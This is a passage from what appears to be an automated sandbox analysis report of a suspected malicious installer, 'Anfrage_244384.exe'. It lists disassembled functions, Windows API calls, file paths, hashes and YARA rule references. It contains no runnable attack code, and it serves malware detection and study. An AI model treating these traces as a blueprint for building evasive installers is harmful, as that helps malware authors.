ShowWindow.USER32(00000008), ref: 0040535F
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405393
CreatePopupMenu.USER32 ref: 004053A4
AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004053B9
GetWindowRect.USER32(?,000000FF), ref: 004053D9
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053F2
SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040542E
OpenClipboard.USER32(00000000), ref: 0040543E
EmptyClipboard.USER32 ref: 00405444
GlobalAlloc.KERNEL32(00000042,?), ref: 0040544D
GlobalLock.KERNEL32(00000000), ref: 00405457
SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040546B
GlobalUnlock.KERNEL32(00000000), ref: 00405484
SetClipboardData.USER32(00000001,00000000), ref: 0040548F
CloseClipboard.USER32 ref: 00405495

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID:
API String ID: 590372296-0
Opcode ID: 312e192eeff1604f0d32da701c70530a671f57ed31088441950e93b34a7e48bf
Instruction ID: 5613d7aab8632e27e9dc55abe2e0ca372eedffe8b3e0cf91bb1740b35a121942
Opcode Fuzzy Hash: 312e192eeff1604f0d32da701c70530a671f57ed31088441950e93b34a7e48bf
Instruction Fuzzy Hash: 8AA14770900608BFDB11AFA1DE89EAE7F79EB08344F40403AFA01B61A0C7755E51DF68

Function 004043E6 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 274stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404435
SetWindowTextA.USER32(00000000,?), ref: 0040445F
SHBrowseForFolderA.SHELL32(?,00429C40,?), ref: 00404510
CoTaskMemFree.OLE32(00000000), ref: 0040451B
lstrcmpiA.KERNEL32(Call,0042A868), ref: 0040454D
lstrcatA.KERNEL32(?,Call), ref: 00404559
SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040456B

Part of subcall function 0040559D: GetDlgItemTextA.USER32(?,?,00000400,004045A2), ref: 004055B0

Part of subcall function 0040602E: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Anfrage_244384.exe",76233410,C:\Users\user\AppData\Local\Temp\,00000000,0040317E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403393), ref: 00406086
Part of subcall function 0040602E: CharNextA.USER32(?,?,?,00000000), ref: 00406093
Part of subcall function 0040602E: CharNextA.USER32(?,"C:\Users\user\Desktop\Anfrage_244384.exe",76233410,C:\Users\user\AppData\Local\Temp\,00000000,0040317E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403393), ref: 00406098
Part of subcall function 0040602E: CharPrevA.USER32(?,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000,0040317E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403393), ref: 004060A8

GetDiskFreeSpaceA.KERNEL32(00429838,?,?,0000040F,?,00429838,00429838,?,00000001,00429838,?,?,000003FB,?), ref: 00404629
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404644

Part of subcall function 0040479D: lstrlenA.KERNEL32(0042A868,0042A868,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004046B8,000000DF,00000000,00000400,?), ref: 0040483B
Part of subcall function 0040479D: wsprintfA.USER32 ref: 00404843
Part of subcall function 0040479D: SetDlgItemTextA.USER32(?,0042A868), ref: 00404856

Strings

Call, xrefs: 00404547, 0040454C, 00404557
A, xrefs: 00404509
C:\Users\user\AppData\Roaming\secretaryships, xrefs: 00404536

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Roaming\secretaryships$Call
API String ID: 2624150263-3216987452
Opcode ID: 69f74c01cbdcf11024f72d1cffdf5a9e01e05ddb1b066f3c04d727bfc8a1ec56
Instruction ID: 84c50741fe25a173814362b43a11873bd68750411b15b34785129881091ebc45
Opcode Fuzzy Hash: 69f74c01cbdcf11024f72d1cffdf5a9e01e05ddb1b066f3c04d727bfc8a1ec56
Instruction Fuzzy Hash: 14A1A5B1900209ABDB11AFA6DD45AAF7BB8EF85314F10843BF601B62D1D77C89418F69

Function 004020CD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00408514,?,00000001,00408504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040214C
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F8

Strings

C:\Users\user\AppData\Roaming\secretaryships\Angoragedernes, xrefs: 0040218C

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Roaming\secretaryships\Angoragedernes
API String ID: 123533781-737122785
Opcode ID: f209c091181f227ba522424908b8d9506dcc11acb2a5460ac331969599ead195
Instruction ID: a586864d88b4a31a2ea0730a18160f458de020bca495768a6a410d99a7d95100
Opcode Fuzzy Hash: f209c091181f227ba522424908b8d9506dcc11acb2a5460ac331969599ead195
Instruction Fuzzy Hash: B4510975A00208BFCB10DFE4CA88A9DBBB6AF48314B2445AAF515FB2D0DA799941CB54

Function 0040655F Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6ffbaa9ab06301a7bcd3d44d98f200676c8088fe61cb4b9d184fb53f21b8863
Instruction ID: 8293cd2a5013187d15d39c8039833727f4f8195ddf88bee04d9fcabafb2459e2
Opcode Fuzzy Hash: f6ffbaa9ab06301a7bcd3d44d98f200676c8088fe61cb4b9d184fb53f21b8863
Instruction Fuzzy Hash: 0EE17B71900709DFDB24CF58C980BAABBF1EB44305F15893EE497A72D1E778AA91CB04

Function 00406D36 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f5d6bccd3c6e1d066a3a8cc38ddd8851f0bfc94fc623702177b12c8f33284cd
Instruction ID: 9f21e3e235d98a7e1251c5e66270d761edb2065f660f80fa18d1a92bf6754199
Opcode Fuzzy Hash: 2f5d6bccd3c6e1d066a3a8cc38ddd8851f0bfc94fc623702177b12c8f33284cd
Instruction Fuzzy Hash: 2DC13971E0021A8BCF14CF68D5905EEBBB2BF98314F26826AD85677384D734A952CF94

Function 004040F1 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 205windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 0040417C
GetDlgItem.USER32(00000000,000003E8), ref: 00404190
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004041AE
GetSysColor.USER32(?), ref: 004041BF
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004041CE
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004041DD
lstrlenA.KERNEL32(?), ref: 004041E0
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004041EF
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404204
GetDlgItem.USER32(?,0000040A), ref: 00404266
SendMessageA.USER32(00000000), ref: 00404269
GetDlgItem.USER32(?,000003E8), ref: 00404294
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004042D4
LoadCursorA.USER32(00000000,00007F02), ref: 004042E3
SetCursor.USER32(00000000), ref: 004042EC
ShellExecuteA.SHELL32(0000070B,open,0042E3A0,00000000,00000000,00000001), ref: 004042FF
LoadCursorA.USER32(00000000,00007F00), ref: 0040430C
SetCursor.USER32(00000000), ref: 0040430F
SendMessageA.USER32(00000111,00000001,00000000), ref: 0040433B
SendMessageA.USER32(00000010,00000000,00000000), ref: 0040434F

Strings

Call, xrefs: 004042BF
N, xrefs: 00404282
open, xrefs: 004042F7

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: Call$N$open
API String ID: 3615053054-2563687911
Opcode ID: 0fabdefe5dfe810703eedaaf7f5204b78cec4d5337582d6cb8c9095239a0e9c5
Instruction ID: 596f938780ddc00ccda35ae91e452bcb2762d229451626cd39d0fa48fc5db7d6
Opcode Fuzzy Hash: 0fabdefe5dfe810703eedaaf7f5204b78cec4d5337582d6cb8c9095239a0e9c5
Instruction Fuzzy Hash: FC61B3B1A40209BFEB109F60DD45F6A7B69FB84701F10803AFB04BA2D1C7B8A951CB58

Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,Debutromaners241 Setup,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C
Debutromaners241 Setup, xrefs: 00401150

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: Debutromaners241 Setup$F
API String ID: 941294808-211529893
Opcode ID: b3683ee5f9b0c2be8bfd93dc29e84564bacc2454be597716fe8f92258ad350e3
Instruction ID: eed311f0ba3f5168439b37af4fa11fc7bb37c730dc1785cefb354bf9b42296a2
Opcode Fuzzy Hash: b3683ee5f9b0c2be8bfd93dc29e84564bacc2454be597716fe8f92258ad350e3
Instruction Fuzzy Hash: FF418C71800209AFCF059F95DE459AFBBB9FF44314F00842EF9A1AA1A0C774E955DFA4

Function 00405B0C Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyA.KERNEL32(0042C5F8,NUL,?,00000000,?,00000000,00405C9F,?,?), ref: 00405B1B
CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,00405C9F,?,?), ref: 00405B3F
GetShortPathNameA.KERNEL32(?,0042C5F8,00000400), ref: 00405B48

Part of subcall function 0040599B: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405BF8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004059AB
Part of subcall function 0040599B: lstrlenA.KERNEL32(00000000,?,00000000,00405BF8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004059DD

GetShortPathNameA.KERNEL32(0042C9F8,0042C9F8,00000400), ref: 00405B65
wsprintfA.USER32 ref: 00405B83
GetFileSize.KERNEL32(00000000,00000000,0042C9F8,C0000000,00000004,0042C9F8,?,?,?,?,?), ref: 00405BBE
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405BCD
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
SetFilePointer.KERNEL32(0040A3B0,00000000,00000000,00000000,00000000,0042C1F8,00000000,-0000000A,0040A3B0,00000000,[Rename],00000000,00000000,00000000), ref: 00405C5B
GlobalFree.KERNEL32(00000000), ref: 00405C6C
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405C73

Part of subcall function 00405A36: GetFileAttributesA.KERNELBASE(00000003,00402D3A,C:\Users\user\Desktop\Anfrage_244384.exe,80000000,00000003), ref: 00405A3A
Part of subcall function 00405A36: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405A5C

Strings

%s=%s, xrefs: 00405B79
NUL, xrefs: 00405B15
[Rename], xrefs: 00405BED, 00405BFF

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
String ID: %s=%s$NUL$[Rename]
API String ID: 222337774-4148678300
Opcode ID: 5ce72f1d5662fdfb16fbdc716e83a23565de7620f696fffa2ec6c38a8c937bd1
Instruction ID: 6293277805e4fd93310031222b01184603883beffbc8e30d5776d07611dc3463
Opcode Fuzzy Hash: 5ce72f1d5662fdfb16fbdc716e83a23565de7620f696fffa2ec6c38a8c937bd1
Instruction Fuzzy Hash: 0D310171204B19BBE2206B255E89F6B3A5CDF42758F14013AFE41F22D2DA7C9C058EAD

Function 0040602E Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Anfrage_244384.exe",76233410,C:\Users\user\AppData\Local\Temp\,00000000,0040317E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403393), ref: 00406086
CharNextA.USER32(?,?,?,00000000), ref: 00406093
CharNextA.USER32(?,"C:\Users\user\Desktop\Anfrage_244384.exe",76233410,C:\Users\user\AppData\Local\Temp\,00000000,0040317E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403393), ref: 00406098
CharPrevA.USER32(?,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000,0040317E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403393), ref: 004060A8

Strings

"C:\Users\user\Desktop\Anfrage_244384.exe", xrefs: 0040606A
C:\Users\user\AppData\Local\Temp\, xrefs: 0040602F
*?|<>/":, xrefs: 00406076

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\Anfrage_244384.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-1646249666
Opcode ID: c65cd21f9bebafd0fa0734b05f9293669e0a6699517ac04d9452259f54362241
Instruction ID: 6dd00fd98cdd52380b6000705bfe1b2e5a3199cd407f9fb4c243556cad1baf37
Opcode Fuzzy Hash: c65cd21f9bebafd0fa0734b05f9293669e0a6699517ac04d9452259f54362241
Instruction Fuzzy Hash: E81104A28847952DEB3296344C44B776F894F967A0F19007BE8C6722C3CA7C5CA2836D

Function 0040400F Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000EB), ref: 0040402C
GetSysColor.USER32(00000000), ref: 00404048
SetTextColor.GDI32(?,00000000), ref: 00404054
SetBkMode.GDI32(?,?), ref: 00404060
GetSysColor.USER32(?), ref: 00404073
SetBkColor.GDI32(?,?), ref: 00404083
DeleteObject.GDI32(?), ref: 0040409D
CreateBrushIndirect.GDI32(?), ref: 004040A7

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: ae3d8a9df92c775f8f54e71e017c7c1ec6869770dfd215418e325c2b67ca61e7
Instruction ID: 4b93f18e3972f6c94df15fd0826ae0e2c8d28fcec101fb7672849d56c603d5ef
Opcode Fuzzy Hash: ae3d8a9df92c775f8f54e71e017c7c1ec6869770dfd215418e325c2b67ca61e7
Instruction Fuzzy Hash: 792124B1500744ABCB319F78DD48B5BBBF8AF41714B04892DEA96F22A0D734D944CB55

Function 100021FA Relevance: 10.6, APIs: 7, Instructions: 139memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 1000234A

Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012CF,-1000404B,100011AB,-000000A0), ref: 10001234

GlobalAlloc.KERNEL32(00000040,?), ref: 100022C3
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 100022D8
GlobalAlloc.KERNEL32(00000040,00000010), ref: 100022E7
CLSIDFromString.OLE32(00000000,00000000), ref: 100022F4
GlobalFree.KERNEL32(00000000), ref: 100022FB

Memory Dump Source

Source File: 00000000.00000002.2608477836.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2608425248.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2608498578.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2608545228.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_Anfrage_244384.jbxd

Similarity

API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
String ID:
API String ID: 3730416702-0
Opcode ID: 8ca201b8c9dcbb45ad50e4cb45e4e1ae2e8a5d70f393ea2d6c63899163ff979d
Instruction ID: bfa8c22ebd78897ea4dc14f883c746723b208fa17a75ef0c69fbb79ff87ab60c
Opcode Fuzzy Hash: 8ca201b8c9dcbb45ad50e4cb45e4e1ae2e8a5d70f393ea2d6c63899163ff979d
Instruction Fuzzy Hash: B541ABB1108311EFF320DFA48884B5BB7F8FF443D1F218529F946D61A9DB34AA448B61

Function 100023DA Relevance: 10.6, APIs: 7, Instructions: 111COMMON

Download Yara Rule

APIs

Part of subcall function 10001215: GlobalAlloc.KERNEL32(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D

GlobalFree.KERNEL32(?), ref: 100024B5
GlobalFree.KERNEL32(00000000), ref: 100024EF

Memory Dump Source

Source File: 00000000.00000002.2608477836.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2608425248.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2608498578.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2608545228.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_Anfrage_244384.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
Instruction ID: 4e6b36a645f71e2aed4a85f2c36ff1861f2741140ba068ae73f9b0a79c1593cf
Opcode Fuzzy Hash: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
Instruction Fuzzy Hash: EA319CB1504250EFF322CF64CCC4C6B7BBDEB852D4B124529FA4193168CB31AC94DB62

Function 00404FDC Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(0042A048,00000000,0041C020,762323A0,?,?,?,?,?,?,?,?,?,0040308E,00000000,?), ref: 00405015
lstrlenA.KERNEL32(0040308E,0042A048,00000000,0041C020,762323A0,?,?,?,?,?,?,?,?,?,0040308E,00000000), ref: 00405025
lstrcatA.KERNEL32(0042A048,0040308E,0040308E,0042A048,00000000,0041C020,762323A0), ref: 00405038
SetWindowTextA.USER32(0042A048,0042A048), ref: 0040504A
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405070
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040508A
SendMessageA.USER32(?,00001013,?,00000000), ref: 00405098

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
